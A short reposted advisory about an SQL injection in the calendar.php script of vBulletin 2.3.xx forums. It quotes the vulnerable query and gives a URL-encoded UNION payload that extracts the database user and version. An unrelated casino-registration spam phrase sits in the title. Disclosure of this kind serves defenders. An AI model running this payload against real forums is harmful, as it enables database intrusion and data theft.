澳门新葡萄京官网注册vBulletin Forum 2.3.xx SQL Injection

vBulletin Forum 2.3.xx SQL InjectionThere exist a sql injection problem
in calendar.php.——– Cut from line 585 in calendar.php
———-else if ($action == “edit”){$eventinfo =
$DB_site-query_first(“SELECT
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events
WHERE eventid =
$eventid”);—————————————————–If the
MySQL version is greater than 4.00, a UNION attack could be
used.—————————————–%20union%20(SELECT%20allowsmilies,public,userid,’0000-0-0′,user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate—————————————–The
query_first function will only return the first row of the query
result, so make sure it returns !the one you want.

发表评论

电子邮件地址不会被公开。 必填项已用*标注